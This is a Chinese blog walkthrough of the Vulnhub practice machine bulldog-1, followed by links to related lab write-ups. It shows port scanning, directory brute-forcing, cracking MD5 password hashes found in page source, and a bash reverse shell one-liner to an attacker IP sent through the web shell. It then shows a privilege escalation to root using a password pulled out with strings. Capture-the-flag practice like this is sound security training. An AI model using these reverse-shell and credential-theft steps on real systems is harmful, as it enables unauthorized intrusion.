Vulnhub靶场第三关

最新推荐文章于 2023-04-12 22:39:01 发布
最新推荐文章于 2023-04-12 22:39:01 发布
阅读量298 收藏
点赞数 1
分类专栏: Vulnhub靶场第三关 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/L1928/article/details/108285717
版权

Vulnhub靶场 bulldog-1
目标:
获得root权限和flflag。
运行环境:
靶机:用VirtualBox启动虚机,导入镜像,网络连接方式设置为桥接到无线网卡。靶机启动后,自动获得IP:
172.20.10.7。
Windows攻击机:物理机,连接无线网卡,自动获取IP:172.20.10.5,安装有Burpsuit、nc、Python2.7、
DirBuster等渗透工具。
Kali攻击机:VMWare启动虚机,桥接到无线网卡,自动获取IP:172.20.10.6。攻击机二选一即可。
渗透攻击:
1.使用nmap扫描ip192.168.1.158
在这里插入图片描述
2.发现端口开启
那么直接访问这个ip
访问成功
在这里插入图片描述
3.没有发现可用信息,进行目录爆破
通过对爆破到的目录进行访问发现了一个登录页面
在这里插入图片描述
4.查看dev 页面
在这里插入图片描述
5.查看页面源码后发现md5加密的代码
在这里插入图片描述
6.进行解码
账号密码:nick--------bulldog
账号密码:sarah-------bulldoglover
7.尝试登录
在这里插入图片描述
登录成功
8.发现可以执行命令
开启nc监听
nc -lvnp 6666
Web-shell输入
echo “bash -i >& /dev/tcp/192.168.1.29/6666 0>&1” | bash
等待监听成功
输入:python -c ‘import pty;pty.spawn("/bin/bash")’
反弹交互式shell成功
在这里插入图片描述
9.
查看系统用户 cat /etc/passwd
查看那些用户值得关注
进入这些用户cd进入
查看当前目录下的所有文件的详细信息,并且查看所有隐藏文件 ls -al
查看可执行文件中的字符串 strings 可执行文件名 查看密码
在这里插入图片描述
执行 Sudo python -c 'import pty;pty.spawn("/bin/bash")'命令
因为sudo只有超级用户才能执行所以会提示输入密码.
输入密码:SUPERultimatePASSWORDyouCANTget
权限提升成功:
在这里插入图片描述
补充:
Sodu -i 为了频繁的执行某些只有超级用户才能执行的权限,而不用每次输入密码,可以使用该命令。提示输入密码时该密码为当前账户的密码。没有时间限制。执行该命令后提示符变为“#”而不是“$”。想退回普通账户时可以执行“exit”或“logout” 。

L无所不能
关注
专栏目录
breach-1--vulnhub靶场
m0_46982383的博客
08-14 2473
keytool -importkeystore -srckeystore /root/下载/keystore -destkeystore /root/下载/keystore.p12 -deststoretype pkcs12。tidyup.sh这是一段清理脚本,描述中说明每3分钟执行清理,删除webapps目录下的文件,因此之前上传的菜刀马总是被删除,需要重新上传。访问https://192.168.110.140:8443/getshell/,等几秒,kali获得反弹shell。*u=G)4m7zB。..
2-vulnhub靶场,Earth
qq_49078152的博客
08-14 1693
vulnhub,earth靶机练习
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-6 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-12 2006
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
vulnhub bulldog
dfhjlll的博客
02-11 330
配置环境 bulldog需要在virtualbox虚拟机下运行,导入后,网卡选择仅主机模式,打开后会自动出现ip ip:192.168.56.101 点开vmware中的虚拟选项编辑器中 点击更改设置,让vmware桥接至VirtualBox Host-Only Ethernet Adapter kali在VMware下运行,设置成桥接模式 打开,查看ip :192.168.56.102 使用...
vulnhub靶场bulldog1
kukudeshuo的博客
08-12 263
vulnhub靶场bulldog1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/bulldog-1,211/ 攻击机:kali(192.168.109.128) 靶机:bulldog1(192.168.109.157) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.109.157 使用nmap扫描查看目标靶机端口开放
Vulnhub靶场渗透练习(三) bulldog
weixin_30563917的博客
07-08 220
拿到靶场后先对ip进行扫描 获取ip 和端口 针对项目路径爆破 获取两个有用文件 http://192.168.18.144/dev/ dev,admin 更具dev 发现他们用到框架和语言 找到一个 shell 连接 http://192.168.18.144/dev/shell/ 反健源码 查看可以看到 丢入md5 网站解密 成功的解密2...
VulnHub渗透测试实战靶场 - Bulldog: 1
LYJ20010728的博客
08-05 503
VulnHub渗透测试实战靶场 - Bulldog: 1环境下载Bulldog: 1靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 Bulldog: 1靶机搭建 具体步骤参考VirtualBox(Host only)和VMware共用同一虚拟网卡 将下载好的靶机环境,导入VritualBox,设置为Host-Only模式 将VMware中桥接模式网卡设置为VritualBox的Host-only 获取到IP地址为:192.168.56.101 渗透测试 信
vulnhub靶场-Prime1
ad12456的博客
03-30 2923
靶场练习,
vulnhub靶场PHINEAS: 1实战记录
aoke79的博客
08-09 1456
vulnhub靶场PHINEAS: 1实战记录
Vulnhub靶场】DOUBLETROUBLE: 1 通关writeup
weixin_44588899的博客
05-20 1085
环境 靶机地址:https://www.vulnhub.com/entry/doubletrouble-1,743/ kali攻击机ip:192.168.220.128 靶机 ip: 靶机地址: 使用命令: arp-scan -l 探测发现是:192.168.220.130 开始探测 nmap -T4 -p- -A 192.168.220.130 发现开放22、80端口, 打开http://192.168.220.130 /,是一个登录框,没什么有价值的东西,直接扫目录吧。 dirb http:
vulnhub靶场实战系列(一)之vulnhub靶场介绍
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-07 3138
我们在学习了各种web漏洞的原理和各种内网的攻击手法的利用之后,需要实战来提升经验,这一环节就可以有操作系统靶场平台来代替一方面因为靶场是现成的,已经搭建好的靶场,只需要下载到本地用虚拟机安装就可以了,非常省时。第二点,非常安全,我们要知道没有经过法律允许的渗透行为是犯法的,而我们使用靶场来模拟达到实战训练的目的的同时也不会触碰法律。名称描述网站vulnhub与Kali同一家公司(offsec)出品。一共有600多个镜像,可以在VMWare或者VirtualBox打开,有不同难度。
CTF学习-Vulnhub 靶场之DOUBLETROUBLE
dengpan119的博客
03-28 3919
Vulnhub 靶场之DOUBLETROUBLE 提示:IP地址用的是复制内网IP,建议是设置自己虚拟网络C段地址。 前言 靶机地址:https://www.vulnhub.com/entry/doubletrouble-1,743/ kali攻击机ip:172.X.X.176 windows10攻击机IP:172.X.X.189 靶机 ip:172.X.X.186-187 工具:VMware Workstation Pro/Oracle VM VirtualBox 提示:以下是本篇文章正文内容,下面案例可
vulnhub】---bulldog靶机
qq_43168364的博客
08-21 384
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:bolldog靶机(192.168.1.105) 攻击机:kali Linux(192.168.1.104) 二、信息收集 主机发现 或者用netdiscover也可以。命令:netdiscover -i eth0 -r 192.168.1.0/24 端口扫描,首先用masscan看看它开启了哪些端口,他的速度过快时貌似发现不了某些端口,可以多扫描几次。 使用nmap进行版本探测
sudo命令中python提权
qq_40898302的博客
05-10 4424
python的提权
【渗透测试】靶机渗透Vulnhub-bulldog
SunnyCat
06-01 3054
目录前言一、bulldog靶机安装二、bulldog靶机渗透1、信息搜集2、Web渗透--后台登录3、Web渗透--命令注入&nc反弹shell4、权限提升渗透步骤回顾感悟 前言 bulldog靶机的渗透有很多的前辈都做了教程,我这篇也是参考了许多前辈的博客,但是中间还是有很多不懂得地方,官方说有两条路可以拿到root,我只找到了一条。以下内容均是我作为一个菜鸡实操之后的所得,为了留个印子记下来。 参考博客: https://blog.csdn.net/Eastmount/article/detai
Bulldog1
haha1314的博客
05-20 681
一、 收集信息 1、 扫描存活主机,找到目标机的ip 2、 扫描目标机的端口信息。 说明可以通过80或8080来访问它 3、 查看一些指纹信息 4、因为是自己搭的所以不需要被动收集 二、 web渗透 1、通过访问发现没有神什么可用信息,就两个页面,审查里面元素也没有可用信息。 2、 扫目录 扫出来目录不多,可以打开看看,也可以用自己的字典 多了一条 http://192.168.88...
Vulnhub系列】bulldog
大方子
09-27 1857
=========================== 个人收获: 1.dirb挖掘网页目录 2.Linux 可以用&同时执行多条命令 3.Kali利用Python搭建简单HTTP服务器 4.python写的shell反弹脚本 5.利用python pty模块的shell来进行交互 ============================ 下载地址:https://d...
bulldog-vulnhub
weixin_43841336的博客
07-18 178
1.nmap扫描存活主机,找到靶机(192.168.34.160) 2.nmap -sV -p0-65535 -T4扫描开放端口 80端口和8080端口一样, 3.用dirb扫描一下 访问/dev 下面有个web-shell进去以后需要登陆 打开源码邮件后面都有MD5加密后的字符串,解密ddf45997a7e18a25ad5f5cf222da64814dd060d5为bulldog,账号为nic...
bulldog1——爆破、命令执行、pty提权
KUKULI233的博客
06-25 530
1.收集信息 netdiscover,是一个二层工具,原理是数据包产生交互即判定主机存活 netdiscover -i eth0 -r 192.168.249.0/24 靶机: 端口扫描 Masscan --rate=100000 -p 0-65535 192.168.249.137 (判断出目标是137) –rate发包数 –ports指定端口数 查看端口服务 Nmap -T4 -sV -O -p 8080,80,23 192.168.249.137 -sV服务版本 -T4速度(最高为5,推荐用4)
vulnhub靶场通关
最新发布
09-09
vulnhub靶场是一个用于学习和测试网络安全技能的平台。通关vulnhub靶场需要进行一系列的渗透测试和漏洞利用操作。根据引用中提供的目录,以下是一个通关vulnhub靶场的大致步骤: 1. 环境搭建:下载靶场环境,并启动...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值